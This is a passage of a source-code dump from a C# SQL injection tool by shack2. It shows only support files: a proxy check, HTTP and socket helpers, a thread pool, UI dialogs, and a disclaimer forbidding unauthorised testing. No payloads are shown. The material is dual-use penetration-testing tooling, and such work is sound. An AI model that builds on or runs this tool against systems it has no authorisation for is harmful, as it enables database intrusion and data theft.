5 | // 有关程序集的常规信息通过以下 6 | // 特性集控制。更改这些特性值可修改 7 | // 与程序集关联的信息。 8 | [assembly: AssemblyTitle("超级SQL注入工具")] 9 | [assembly: AssemblyDescription("design by shack2")] 10 | [assembly: AssemblyConfiguration("")] 11 | [assembly: AssemblyCompany("www.shack2.org")] 12 | [assembly: 
AssemblyProduct("超级SQL注入工具")] 13 | [assembly: AssemblyCopyright("Copyright © 2014-2020")] 14 | [assembly: AssemblyTrademark("")] 15 | [assembly: AssemblyCulture("")] 16 | 17 | // 将 ComVisible 设置为 false 使此程序集中的类型 18 | // 对 COM 组件不可见。如果需要从 COM 访问此程序集中的类型, 19 | // 则将该类型上的 ComVisible 特性设置为 true。 20 | [assembly: ComVisible(false)] 21 | 22 | // 如果此项目向 COM 公开,则下列 GUID 用于类型库的 ID 23 | [assembly: Guid("d5688068-fc89-467d-913f-037a785caca7")] 24 | 25 | // 程序集的版本信息由下面四个值组成: 26 | // 27 | // 主版本 28 | // 次版本 29 | // 内部版本号 30 | // 修订号 31 | // 32 | // 可以指定所有这些值,也可以使用“内部版本号”和“修订号”的默认值, 33 | // 方法是按如下所示使用“*”: 34 | // [assembly: AssemblyVersion("1.0.*")] 35 | [assembly: AssemblyVersion("1.2020.02.09")] 36 | [assembly: AssemblyFileVersion("1.2020.02.09")] 37 | -------------------------------------------------------------------------------- /SuperSQLInjection/ShowResponse.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.ComponentModel; 4 | using System.Data; 5 | using System.Drawing; 6 | using System.Text; 7 | using System.Windows.Forms; 8 | using model; 9 | 10 | namespace SuperSQLInjection 11 | { 12 | public partial class ShowResponse : Form 13 | { 14 | public ShowResponse() 15 | { 16 | InitializeComponent(); 17 | } 18 | 19 | public ServerInfo server = new ServerInfo(); 20 | 21 | private void ShowResponse_Shown(object sender, EventArgs e) 22 | { 23 | this.txt_requestHeader.Text = this.server.reuqestHeader; 24 | this.txt_requestBody.Text = this.server.reuqestBody; 25 | this.txt_responseHeader.Text = this.server.header; 26 | this.txt_responseBody.Text = this.server.body; 27 | 28 | this.webBrowser1.ScriptErrorsSuppressed = true; 29 | this.webBrowser1.DocumentText = this.server.body; 30 | } 31 | 32 | private void txt_responseBody_KeyDown(object sender, KeyEventArgs e) 33 | { 34 | if (e.Modifiers == Keys.Control && e.KeyCode == Keys.F) 35 | { 36 | FindString fs = new FindString(); 37 
| fs.txtbox = this.txt_responseBody; 38 | fs.Show(); 39 | } 40 | } 41 | 42 | } 43 | } 44 | -------------------------------------------------------------------------------- /SuperSQLInjection/tools/http/HttpProxy.cs: -------------------------------------------------------------------------------- 1 | using Amib.Threading.Internal; 2 | using model; 3 | using SuperSQLInjection.model; 4 | using System; 5 | using System.Collections.Generic; 6 | using System.Linq; 7 | using System.Net; 8 | using System.Net.Sockets; 9 | using System.Text; 10 | using tools; 11 | 12 | namespace SuperSQLInjection.tools.http 13 | { 14 | class HttpProxy 15 | { 16 | private static String request = "GET http://{host}:{port}/ HTTP/1.1\r\nHost: {host}:{port}\r\nConnection: close\r\nUser-Agent: Mozilla/5.0\r\nAccept: */*\r\nAccept-Encoding: gzip, deflate\r\n\r\n"; 17 | public static int ConectProxyUseTime = 0; 18 | public static bool checkConnection(Config config,Proxy proxy) { 19 | String crequest = request.Replace("{host}", config.proxy_check_host).Replace("{port}", config.proxy_check_port.ToString()); 20 | ServerInfo server=HTTP.sendRequestRetry(false,config.reTry,proxy.host, proxy.port, "", crequest, config.timeOut, config.encoding, true, false); 21 | 22 | if ((!String.IsNullOrEmpty(server.body)&& server.body.IndexOf(config.proxy_check_Keys)!=-1)||server.header.IndexOf("domain=.baidu.com")!=-1) 23 | { 24 | ConectProxyUseTime = (int)server.runTime; 25 | return true; 26 | } 27 | else { 28 | return false; 29 | } 30 | } 31 | 32 | } 33 | } 34 | -------------------------------------------------------------------------------- /SuperSQLInjection.sln: -------------------------------------------------------------------------------- 1 | 2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio 14 4 | VisualStudioVersion = 14.0.25420.1 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "SuperSQLInjection", 
"SuperSQLInjection\SuperSQLInjection.csproj", "{6C2AE3DB-3349-4A1F-9287-9278629CD0D6}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|Any CPU = Debug|Any CPU 11 | Debug|x86 = Debug|x86 12 | Release|Any CPU = Release|Any CPU 13 | Release|x86 = Release|x86 14 | EndGlobalSection 15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 16 | {6C2AE3DB-3349-4A1F-9287-9278629CD0D6}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 17 | {6C2AE3DB-3349-4A1F-9287-9278629CD0D6}.Debug|Any CPU.Build.0 = Debug|Any CPU 18 | {6C2AE3DB-3349-4A1F-9287-9278629CD0D6}.Debug|x86.ActiveCfg = Debug|x86 19 | {6C2AE3DB-3349-4A1F-9287-9278629CD0D6}.Debug|x86.Build.0 = Debug|x86 20 | {6C2AE3DB-3349-4A1F-9287-9278629CD0D6}.Release|Any CPU.ActiveCfg = Release|Any CPU 21 | {6C2AE3DB-3349-4A1F-9287-9278629CD0D6}.Release|Any CPU.Build.0 = Release|Any CPU 22 | {6C2AE3DB-3349-4A1F-9287-9278629CD0D6}.Release|x86.ActiveCfg = Release|x86 23 | {6C2AE3DB-3349-4A1F-9287-9278629CD0D6}.Release|x86.Build.0 = Release|x86 24 | EndGlobalSection 25 | GlobalSection(SolutionProperties) = preSolution 26 | HideSolutionNode = FALSE 27 | EndGlobalSection 28 | EndGlobal 29 | -------------------------------------------------------------------------------- /SuperSQLInjection/tools/smartthread/SmartThreadPool.ThreadEntry.cs: -------------------------------------------------------------------------------- 1 | 2 | using System; 3 | using Amib.Threading.Internal; 4 | 5 | namespace Amib.Threading 6 | { 7 | public partial class SmartThreadPool 8 | { 9 | #region ThreadEntry class 10 | 11 | internal class ThreadEntry 12 | { 13 | /// 14 | /// The thread creation time 15 | /// The value is stored as UTC value. 16 | /// 17 | private readonly DateTime _creationTime; 18 | 19 | /// 20 | /// The last time this thread has been running 21 | /// It is updated by IAmAlive() method 22 | /// The value is stored as UTC value. 
23 | /// 24 | private DateTime _lastAliveTime; 25 | 26 | /// 27 | /// A reference from each thread in the thread pool to its SmartThreadPool 28 | /// object container. 29 | /// With this variable a thread can know whatever it belongs to a 30 | /// SmartThreadPool. 31 | /// 32 | private readonly SmartThreadPool _associatedSmartThreadPool; 33 | 34 | /// 35 | /// A reference to the current work item a thread from the thread pool 36 | /// is executing. 37 | /// 38 | public WorkItem CurrentWorkItem { get; set; } 39 | 40 | public ThreadEntry(SmartThreadPool stp) 41 | { 42 | _associatedSmartThreadPool = stp; 43 | _creationTime = DateTime.UtcNow; 44 | _lastAliveTime = DateTime.MinValue; 45 | } 46 | 47 | public SmartThreadPool AssociatedSmartThreadPool 48 | { 49 | get { return _associatedSmartThreadPool; } 50 | } 51 | 52 | public void IAmAlive() 53 | { 54 | _lastAliveTime = DateTime.UtcNow; 55 | } 56 | } 57 | 58 | #endregion 59 | } 60 | } -------------------------------------------------------------------------------- /SuperSQLInjection/tools/smartthread/STPEventWaitHandle.cs: -------------------------------------------------------------------------------- 1 | #if !(_WINDOWS_CE) 2 | 3 | using System; 4 | using System.Threading; 5 | 6 | namespace Amib.Threading.Internal 7 | { 8 | #if _SILVERLIGHT || WINDOWS_PHONE 9 | internal static class STPEventWaitHandle 10 | { 11 | public const int WaitTimeout = Timeout.Infinite; 12 | 13 | internal static bool WaitAll(WaitHandle[] waitHandles, int millisecondsTimeout, bool exitContext) 14 | { 15 | return WaitHandle.WaitAll(waitHandles, millisecondsTimeout); 16 | } 17 | 18 | internal static int WaitAny(WaitHandle[] waitHandles) 19 | { 20 | return WaitHandle.WaitAny(waitHandles); 21 | } 22 | 23 | internal static int WaitAny(WaitHandle[] waitHandles, int millisecondsTimeout, bool exitContext) 24 | { 25 | return WaitHandle.WaitAny(waitHandles, millisecondsTimeout); 26 | } 27 | 28 | internal static bool WaitOne(WaitHandle waitHandle, int 
millisecondsTimeout, bool exitContext) 29 | { 30 | return waitHandle.WaitOne(millisecondsTimeout); 31 | } 32 | } 33 | #else 34 | internal static class STPEventWaitHandle 35 | { 36 | public const int WaitTimeout = Timeout.Infinite; 37 | 38 | internal static bool WaitAll(WaitHandle[] waitHandles, int millisecondsTimeout, bool exitContext) 39 | { 40 | return WaitHandle.WaitAll(waitHandles, millisecondsTimeout, exitContext); 41 | } 42 | 43 | internal static int WaitAny(WaitHandle[] waitHandles) 44 | { 45 | return WaitHandle.WaitAny(waitHandles); 46 | } 47 | 48 | internal static int WaitAny(WaitHandle[] waitHandles, int millisecondsTimeout, bool exitContext) 49 | { 50 | return WaitHandle.WaitAny(waitHandles, millisecondsTimeout, exitContext); 51 | } 52 | 53 | internal static bool WaitOne(WaitHandle waitHandle, int millisecondsTimeout, bool exitContext) 54 | { 55 | return waitHandle.WaitOne(millisecondsTimeout, exitContext); 56 | } 57 | } 58 | #endif 59 | 60 | } 61 | 62 | #endif -------------------------------------------------------------------------------- /SuperSQLInjection/AddNode.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.ComponentModel; 4 | using System.Data; 5 | using System.Drawing; 6 | using System.Text; 7 | using System.Windows.Forms; 8 | using tools; 9 | 10 | namespace SuperSQLInjection 11 | { 12 | public partial class AddNode : Form 13 | { 14 | public AddNode() 15 | { 16 | InitializeComponent(); 17 | } 18 | 19 | public TreeNode tn = null; 20 | public TreeView tvw = null; 21 | public int type = 0; 22 | 23 | private void btn_addNode_Click(object sender, EventArgs e) 24 | { 25 | if (this.txt_node_text.TextLength <= 0) 26 | { 27 | MessageBox.Show("请输入节点的值!"); 28 | return; 29 | } 30 | TreeNode ctn = new TreeNode(this.txt_node_text.Text); 31 | if (type == 1) 32 | { 33 | ctn.Tag = "dbs"; 34 | 35 | if 
(Tools.isExistsNode(tvw.Nodes,this.txt_node_text.Text)) 36 | { 37 | MessageBox.Show("已存在相同的节点!"); 38 | } 39 | else { 40 | tvw.Nodes.Add(ctn); 41 | } 42 | } 43 | 44 | else { 45 | 46 | if (tn != null) 47 | { 48 | if ("dbs".Equals(tn.Tag)) 49 | { 50 | ctn.Tag = "table"; 51 | } 52 | else if ("table".Equals(tn.Tag)) 53 | { 54 | ctn.Tag = "column"; 55 | } 56 | if (Tools.isExistsNode(tn.Nodes, this.txt_node_text.Text)) 57 | { 58 | MessageBox.Show("已存在相同的节点!"); 59 | } 60 | else 61 | { 62 | tn.Nodes.Add(ctn); 63 | } 64 | 65 | } 66 | else 67 | { 68 | MessageBox.Show("请选择添加表或列对应的数据库或表!"); 69 | } 70 | } 71 | 72 | 73 | } 74 | } 75 | } 76 | -------------------------------------------------------------------------------- /SuperSQLInjection/tools/http/HttpTools.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Text; 4 | using System.Net; 5 | using System.IO; 6 | using System.Net.Sockets; 7 | using System.Text.RegularExpressions; 8 | using model; 9 | using System.Threading; 10 | 11 | namespace tools 12 | { 13 | 14 | class HttpTools 15 | { 16 | public static String getHTMLEncoding(String header){ 17 | 18 | Match m=Regex.Match(header, "charset=\\S{0,8}\""); 19 | if (m.Success) { 20 | return m.Groups[0].Value.Replace("charset=","").Replace("\"",""); 21 | } 22 | return ""; 23 | } 24 | public static String getHtml(String url, int timeout) 25 | { 26 | String html = ""; 27 | HttpWebResponse response = null; 28 | StreamReader sr = null; 29 | HttpWebRequest request = null; 30 | try 31 | { 32 | 33 | //设置模拟http访问参数 34 | Uri uri = new Uri(url); 35 | request = (HttpWebRequest)WebRequest.Create(uri); 36 | request.Accept = "*/*"; 37 | request.Method = "GET"; 38 | request.Timeout = timeout * 1000; 39 | request.AllowAutoRedirect = false; 40 | response = (HttpWebResponse)request.GetResponse(); 41 | sr = new StreamReader(response.GetResponseStream(), Encoding.UTF8); 42 | 43 | //读取服务器端返回的消息 44 | 
html = sr.ReadToEnd(); 45 | 46 | } 47 | catch (Exception e) 48 | { 49 | Tools.SysLog(e.Message); 50 | } 51 | finally 52 | { 53 | if (sr != null) 54 | { 55 | sr.Close(); 56 | } 57 | if (response != null) 58 | { 59 | response.Close(); 60 | } 61 | if (request != null) 62 | { 63 | request.Abort(); 64 | } 65 | } 66 | return html; 67 | } 68 | 69 | } 70 | } 71 | -------------------------------------------------------------------------------- /SuperSQLInjection/tools/smartthread/SynchronizedDictionary.cs: -------------------------------------------------------------------------------- 1 | using System.Collections.Generic; 2 | 3 | namespace Amib.Threading.Internal 4 | { 5 | internal class SynchronizedDictionary 6 | { 7 | private readonly Dictionary _dictionary; 8 | private readonly object _lock; 9 | 10 | public SynchronizedDictionary() 11 | { 12 | _lock = new object(); 13 | _dictionary = new Dictionary(); 14 | } 15 | 16 | public int Count 17 | { 18 | get { return _dictionary.Count; } 19 | } 20 | 21 | public bool Contains(TKey key) 22 | { 23 | lock (_lock) 24 | { 25 | return _dictionary.ContainsKey(key); 26 | } 27 | } 28 | 29 | public void Remove(TKey key) 30 | { 31 | lock (_lock) 32 | { 33 | _dictionary.Remove(key); 34 | } 35 | } 36 | 37 | public object SyncRoot 38 | { 39 | get { return _lock; } 40 | } 41 | 42 | public TValue this[TKey key] 43 | { 44 | get 45 | { 46 | lock (_lock) 47 | { 48 | return _dictionary[key]; 49 | } 50 | } 51 | set 52 | { 53 | lock (_lock) 54 | { 55 | _dictionary[key] = value; 56 | } 57 | } 58 | } 59 | 60 | public Dictionary.KeyCollection Keys 61 | { 62 | get 63 | { 64 | lock (_lock) 65 | { 66 | return _dictionary.Keys; 67 | } 68 | } 69 | } 70 | 71 | public Dictionary.ValueCollection Values 72 | { 73 | get 74 | { 75 | lock (_lock) 76 | { 77 | return _dictionary.Values; 78 | } 79 | } 80 | } 81 | public void Clear() 82 | { 83 | lock (_lock) 84 | { 85 | _dictionary.Clear(); 86 | } 87 | } 88 | } 89 | } 90 | 
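--------------------------------------------------------------------------------
/SuperSQLInjection/tools/http/TimeOutSocket.cs:
--------------------------------------------------------------------------------
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.Net;
using System.Net.Sockets;
using System.Text;
using System.Threading;

namespace SuperSQLInjection.tools.http
{
    /// <summary>
    /// Opens a TCP connection with an upper bound on how long the connect may take.
    /// </summary>
    /// <remarks>
    /// The connect state is kept in instance fields, so one instance must not run
    /// two Connect calls at the same time.
    /// </remarks>
    class TimeOutSocket
    {
        // Set by the connect callback; read by Connect once the event is signalled.
        private bool IsConnectionSuccessful = false;
        // Exception captured by the connect callback, if any.
        private Exception socketexception = null;
        // Signalled by the callback when the asynchronous connect has finished.
        private ManualResetEvent TimeoutObject = new ManualResetEvent(false);
        // Milliseconds the last successful connect took.
        public int useTime = 0;

        /// <summary>
        /// Connects to host:port and waits at most timeoutMSec milliseconds.
        /// </summary>
        /// <param name="host">Host name or address to connect to.</param>
        /// <param name="port">TCP port to connect to.</param>
        /// <param name="timeoutMSec">Maximum wait in milliseconds.</param>
        /// <returns>The connected client; the caller owns it and must close it.</returns>
        /// <exception cref="TimeoutException">The connect did not finish in time.</exception>
        /// <exception cref="SocketException">
        /// The connect finished without success and the callback captured no exception.
        /// </exception>
        public TcpClient Connect(String host,int port,int timeoutMSec)
        {
            Stopwatch sw = Stopwatch.StartNew();
            TimeoutObject.Reset();
            socketexception = null;
            IsConnectionSuccessful = false;

            TcpClient tcpclient = new TcpClient();
            try
            {
                tcpclient.BeginConnect(host, port, new AsyncCallback(CallBackMethod), tcpclient);
            }
            catch
            {
                // BeginConnect can fail before any callback runs; release the socket.
                tcpclient.Close();
                throw;
            }

            if (!TimeoutObject.WaitOne(timeoutMSec, false))
            {
                tcpclient.Close();
                throw new TimeoutException("TimeOut Exception");
            }

            if (IsConnectionSuccessful)
            {
                sw.Stop();
                useTime = (int)sw.ElapsedMilliseconds;
                return tcpclient;
            }

            // Failed connect: close the client instead of leaking it, and never
            // throw a null reference when the callback recorded no exception.
            tcpclient.Close();
            throw socketexception ?? new SocketException((int)SocketError.NotConnected);
        }

        /// <summary>
        /// Completion callback for BeginConnect: records success or the exception
        /// and always signals the waiting Connect call.
        /// </summary>
        /// <param name="asyncresult">Async result whose state is the TcpClient.</param>
        private void CallBackMethod(IAsyncResult asyncresult)
        {
            try
            {
                IsConnectionSuccessful = false;
                TcpClient tcpclient = asyncresult.AsyncState as TcpClient;

                // Client is checked so that a client without a socket is not
                // passed to EndConnect.
                if (tcpclient != null && tcpclient.Client != null)
                {
                    tcpclient.EndConnect(asyncresult);
                    IsConnectionSuccessful = true;
                }
            }
            catch (Exception ex)
            {
                IsConnectionSuccessful = false;
                socketexception = ex;
            }
            finally
            {
                TimeoutObject.Set();
            }
        }
    }
}
--------------------------------------------------------------------------------
/SuperSQLInjection/FindString.cs: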
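--------------------------------------------------------------------------------
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Linq;
using System.Text;
using System.Windows.Forms;

namespace SuperSQLInjection
{
    /// <summary>
    /// Small "find" dialog that searches the text of a RichTextBox supplied by the opener.
    /// </summary>
    public partial class FindString : Form
    {
        public FindString()
        {
            InitializeComponent();
        }

        // Offset in txtbox.Text where the next "find" starts.
        public int searchPoint = 0;
        // Text box to search; set by the form that opens this dialog.
        public RichTextBox txtbox = null;

        /// <summary>
        /// Finds the next occurrence of the key after searchPoint and selects it.
        /// </summary>
        /// <remarks>
        /// This search is case-sensitive, while the match counter in
        /// txt_key_TextChanged ignores case, so the two can disagree.
        /// </remarks>
        private void btn_find_Click(object sender, EventArgs e)
        {
            string key = this.txt_key.Text;
            // Read Text once: the property rebuilds the string on every access.
            string content = (txtbox == null) ? "" : txtbox.Text;

            if (content == "" || key == "")
            {
                // Nothing to search in, or nothing to search for.
                MessageBox.Show("查找内容为空,请输入查找内容", "", MessageBoxButtons.OK, MessageBoxIcon.Error);
                return;
            }

            // The text may have changed since the previous search; an offset past
            // the end would make IndexOf throw ArgumentOutOfRangeException.
            if (searchPoint < 0 || searchPoint > content.Length)
            {
                searchPoint = 0;
            }

            int hit = content.IndexOf(key, searchPoint);
            if (hit < 0)
            {
                // Not found: report it and wrap around to the start.
                MessageBox.Show("已到文本末尾,没有找到", "提示", MessageBoxButtons.OK, MessageBoxIcon.Information);
                searchPoint = 0;
                return;
            }

            // Found: select the match and continue after it next time.
            txtbox.Focus();
            txtbox.SelectionStart = hit;
            txtbox.SelectionLength = key.Length;
            searchPoint = hit + key.Length;
        }

        /// <summary>
        /// Recounts the case-insensitive occurrences of the key, overlapping ones
        /// included, and shows the total in label2.
        /// </summary>
        private void txt_key_TextChanged(object sender, EventArgs e)
        {
            string search = this.txt_key.Text;
            if ("".Equals(search) || txtbox == null)
            {
                return;
            }

            // Read Text once and let IndexOf scan; the per-position Substring and
            // ToLower calls allocated two strings for every character of the text.
            string content = txtbox.Text;
            int count = 0;
            int from = 0;
            while (from <= content.Length - search.Length)
            {
                int hit = content.IndexOf(search, from, StringComparison.OrdinalIgnoreCase);
                if (hit < 0)
                {
                    break;
                }
                count++;
                from = hit + 1; // step by one so overlapping matches still count
            }
            this.label2.Text = "匹配:" + count.ToString();
        }
    }
}
--------------------------------------------------------------------------------
/SuperSQLInjection/model/SerializableDictionary.cs: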
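using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Xml;
using System.Xml.Schema;
using System.Xml.Serialization;

namespace SuperSQLInjection.model
{
    /// <summary>
    /// A Dictionary that implements IXmlSerializable; each entry is written as a
    /// SerializableDictionary element holding a key and a value element.
    /// </summary>
    /// <typeparam name="TKey">Key type; XmlSerializer must be able to handle it.</typeparam>
    /// <typeparam name="TValue">Value type; XmlSerializer must be able to handle it.</typeparam>
    [Serializable]
    public class SerializableDictionary<TKey, TValue> : Dictionary<TKey, TValue>, IXmlSerializable
    {
        public SerializableDictionary() { }

        /// <summary>
        /// Writes every entry of the dictionary to the writer.
        /// </summary>
        /// <param name="write">Writer positioned inside the dictionary's element.</param>
        public void WriteXml(XmlWriter write)
        {
            XmlSerializer KeySerializer = new XmlSerializer(typeof(TKey));
            XmlSerializer ValueSerializer = new XmlSerializer(typeof(TValue));

            foreach (KeyValuePair<TKey, TValue> kv in this)
            {
                write.WriteStartElement("SerializableDictionary");
                write.WriteStartElement("key");
                KeySerializer.Serialize(write, kv.Key);
                write.WriteEndElement();
                write.WriteStartElement("value");
                ValueSerializer.Serialize(write, kv.Value);
                write.WriteEndElement();
                write.WriteEndElement();
            }
        }

        /// <summary>
        /// Reads entries from the reader and adds them to this dictionary.
        /// </summary>
        /// <param name="reader">Reader positioned on the dictionary's start element.</param>
        /// <exception cref="ArgumentException">The XML holds the same key twice.</exception>
        /// <remarks>
        /// NOTE(review): the reader is created by the caller. When the XML comes
        /// from a file supplied by someone else, confirm that the caller creates
        /// the reader with DTD processing prohibited.
        /// </remarks>
        public void ReadXml(XmlReader reader)
        {
            // An empty dictionary is written as a self-closing element; after the
            // Read() below there is nothing of ours left to parse.
            bool wasEmpty = reader.IsEmptyElement;
            reader.Read();
            if (wasEmpty)
            {
                return;
            }

            XmlSerializer KeySerializer = new XmlSerializer(typeof(TKey));
            XmlSerializer ValueSerializer = new XmlSerializer(typeof(TValue));

            // Skip whitespace so an element holding only blanks ends the loop at once.
            reader.MoveToContent();
            while (reader.NodeType != XmlNodeType.EndElement)
            {
                reader.ReadStartElement("SerializableDictionary");
                reader.ReadStartElement("key");
                TKey tk = (TKey)KeySerializer.Deserialize(reader);
                reader.ReadEndElement();
                reader.ReadStartElement("value");
                TValue vl = (TValue)ValueSerializer.Deserialize(reader);
                reader.ReadEndElement();
                reader.ReadEndElement();
                this.Add(tk, vl);
                reader.MoveToContent();
            }
            reader.ReadEndElement();
        }

        /// <summary>
        /// Returns null, so no schema is supplied for this type.
        /// </summary>
        public XmlSchema GetSchema()
        {
            return null;
        }
    }
}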
/SuperSQLInjection/tools/smartthread/WorkItemInfo.cs: -------------------------------------------------------------------------------- 1 | namespace Amib.Threading 2 | { 3 | #region WorkItemInfo class 4 | 5 | /// 6 | /// Summary description for WorkItemInfo. 7 | /// 8 | public class WorkItemInfo 9 | { 10 | public WorkItemInfo() 11 | { 12 | UseCallerCallContext = SmartThreadPool.DefaultUseCallerCallContext; 13 | UseCallerHttpContext = SmartThreadPool.DefaultUseCallerHttpContext; 14 | DisposeOfStateObjects = SmartThreadPool.DefaultDisposeOfStateObjects; 15 | CallToPostExecute = SmartThreadPool.DefaultCallToPostExecute; 16 | PostExecuteWorkItemCallback = SmartThreadPool.DefaultPostExecuteWorkItemCallback; 17 | WorkItemPriority = SmartThreadPool.DefaultWorkItemPriority; 18 | } 19 | 20 | public WorkItemInfo(WorkItemInfo workItemInfo) 21 | { 22 | UseCallerCallContext = workItemInfo.UseCallerCallContext; 23 | UseCallerHttpContext = workItemInfo.UseCallerHttpContext; 24 | DisposeOfStateObjects = workItemInfo.DisposeOfStateObjects; 25 | CallToPostExecute = workItemInfo.CallToPostExecute; 26 | PostExecuteWorkItemCallback = workItemInfo.PostExecuteWorkItemCallback; 27 | WorkItemPriority = workItemInfo.WorkItemPriority; 28 | Timeout = workItemInfo.Timeout; 29 | } 30 | 31 | /// 32 | /// Get/Set if to use the caller's security context 33 | /// 34 | public bool UseCallerCallContext { get; set; } 35 | 36 | /// 37 | /// Get/Set if to use the caller's HTTP context 38 | /// 39 | public bool UseCallerHttpContext { get; set; } 40 | 41 | /// 42 | /// Get/Set if to dispose of the state object of a work item 43 | /// 44 | public bool DisposeOfStateObjects { get; set; } 45 | 46 | /// 47 | /// Get/Set the run the post execute options 48 | /// 49 | public CallToPostExecute CallToPostExecute { get; set; } 50 | 51 | /// 52 | /// Get/Set the post execute callback 53 | /// 54 | public PostExecuteWorkItemCallback PostExecuteWorkItemCallback { get; set; } 55 | 56 | /// 57 | /// Get/Set the work 
item's priority 58 | /// 59 | public WorkItemPriority WorkItemPriority { get; set; } 60 | 61 | /// 62 | /// Get/Set the work item's timout in milliseconds. 63 | /// This is a passive timout. When the timout expires the work item won't be actively aborted! 64 | /// 65 | public long Timeout { get; set; } 66 | } 67 | 68 | #endregion 69 | } 70 | -------------------------------------------------------------------------------- /.gitattributes: -------------------------------------------------------------------------------- 1 | ############################################################################### 2 | # Set default behavior to automatically normalize line endings. 3 | ############################################################################### 4 | * text=auto 5 | 6 | ############################################################################### 7 | # Set default behavior for command prompt diff. 8 | # 9 | # This is need for earlier builds of msysgit that does not have it on by 10 | # default for csharp files. 11 | # Note: This is only used by command line 12 | ############################################################################### 13 | #*.cs diff=csharp 14 | 15 | ############################################################################### 16 | # Set the merge driver for project and solution files 17 | # 18 | # Merging from the command prompt will add diff markers to the files if there 19 | # are conflicts (Merging from VS is not affected by the settings below, in VS 20 | # the diff markers are never inserted). Diff markers may cause the following 21 | # file extensions to fail to load in VS. An alternative would be to treat 22 | # these files as binary and thus will always conflict and require user 23 | # intervention with every merge. 
To do so, just uncomment the entries below 24 | ############################################################################### 25 | #*.sln merge=binary 26 | #*.csproj merge=binary 27 | #*.vbproj merge=binary 28 | #*.vcxproj merge=binary 29 | #*.vcproj merge=binary 30 | #*.dbproj merge=binary 31 | #*.fsproj merge=binary 32 | #*.lsproj merge=binary 33 | #*.wixproj merge=binary 34 | #*.modelproj merge=binary 35 | #*.sqlproj merge=binary 36 | #*.wwaproj merge=binary 37 | 38 | ############################################################################### 39 | # behavior for image files 40 | # 41 | # image files are treated as binary by default. 42 | ############################################################################### 43 | #*.jpg binary 44 | #*.png binary 45 | #*.gif binary 46 | 47 | ############################################################################### 48 | # diff behavior for common document formats 49 | # 50 | # Convert binary document formats to text before diffing them. This feature 51 | # is only available from the command line. Turn it on by uncommenting the 52 | # entries below. 53 | ############################################################################### 54 | #*.doc diff=astextplain 55 | #*.DOC diff=astextplain 56 | #*.docx diff=astextplain 57 | #*.DOCX diff=astextplain 58 | #*.dot diff=astextplain 59 | #*.DOT diff=astextplain 60 | #*.pdf diff=astextplain 61 | #*.PDF diff=astextplain 62 | #*.rtf diff=astextplain 63 | #*.RTF diff=astextplain 64 | -------------------------------------------------------------------------------- /SuperSQLInjection/Waring.Designer.cs: -------------------------------------------------------------------------------- 1 | namespace SuperSQLInjection 2 | { 3 | partial class Waring 4 | { 5 | /// 6 | /// Required designer variable. 7 | /// 8 | private System.ComponentModel.IContainer components = null; 9 | 10 | /// 11 | /// Clean up any resources being used. 
12 | /// 13 | /// true if managed resources should be disposed; otherwise, false. 14 | protected override void Dispose(bool disposing) 15 | { 16 | if (disposing && (components != null)) 17 | { 18 | components.Dispose(); 19 | } 20 | base.Dispose(disposing); 21 | } 22 | 23 | #region Windows Form Designer generated code 24 | 25 | /// 26 | /// Required method for Designer support - do not modify 27 | /// the contents of this method with the code editor. 28 | /// 29 | private void InitializeComponent() 30 | { 31 | this.richTextBox1 = new System.Windows.Forms.RichTextBox(); 32 | this.SuspendLayout(); 33 | // 34 | // richTextBox1 35 | // 36 | this.richTextBox1.Anchor = ((System.Windows.Forms.AnchorStyles)((((System.Windows.Forms.AnchorStyles.Top | System.Windows.Forms.AnchorStyles.Bottom) 37 | | System.Windows.Forms.AnchorStyles.Left) 38 | | System.Windows.Forms.AnchorStyles.Right))); 39 | this.richTextBox1.BorderStyle = System.Windows.Forms.BorderStyle.None; 40 | this.richTextBox1.Location = new System.Drawing.Point(12, 12); 41 | this.richTextBox1.Name = "richTextBox1"; 42 | this.richTextBox1.ReadOnly = true; 43 | this.richTextBox1.Size = new System.Drawing.Size(463, 94); 44 | this.richTextBox1.TabIndex = 0; 45 | this.richTextBox1.Text = "本工具提供给个人、站长、企业、渗透测试工程师、Web安全工程师等信息安全人员进行信息安全检查工具,请勿利用此工具进行非授权测试,产生的法律责任与作者无关。\n作者:" + 46 | "shack2\nQQ:1341413415\n官网:www.shack2.org"; 47 | // 48 | // Waring 49 | // 50 | this.AutoScaleDimensions = new System.Drawing.SizeF(6F, 12F); 51 | this.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font; 52 | this.ClientSize = new System.Drawing.Size(487, 117); 53 | this.Controls.Add(this.richTextBox1); 54 | this.Name = "Waring"; 55 | this.StartPosition = System.Windows.Forms.FormStartPosition.CenterScreen; 56 | this.Text = "声 明"; 57 | this.ResumeLayout(false); 58 | 59 | } 60 | 61 | #endregion 62 | 63 | private System.Windows.Forms.RichTextBox richTextBox1; 64 | } 65 | } 
-------------------------------------------------------------------------------- /SuperSQLInjection/About.Designer.cs: -------------------------------------------------------------------------------- 1 | namespace SuperSQLInjection 2 | { 3 | partial class About 4 | { 5 | /// 6 | /// Required designer variable. 7 | /// 8 | private System.ComponentModel.IContainer components = null; 9 | 10 | /// 11 | /// Clean up any resources being used. 12 | /// 13 | /// true if managed resources should be disposed; otherwise, false. 14 | protected override void Dispose(bool disposing) 15 | { 16 | if (disposing && (components != null)) 17 | { 18 | components.Dispose(); 19 | } 20 | base.Dispose(disposing); 21 | } 22 | 23 | #region Windows Form Designer generated code 24 | 25 | /// 26 | /// Required method for Designer support - do not modify 27 | /// the contents of this method with the code editor. 28 | /// 29 | private void InitializeComponent() 30 | { 31 | System.ComponentModel.ComponentResourceManager resources = new System.ComponentModel.ComponentResourceManager(typeof(About)); 32 | this.richTextBox1 = new System.Windows.Forms.RichTextBox(); 33 | this.SuspendLayout(); 34 | // 35 | // richTextBox1 36 | // 37 | this.richTextBox1.Anchor = 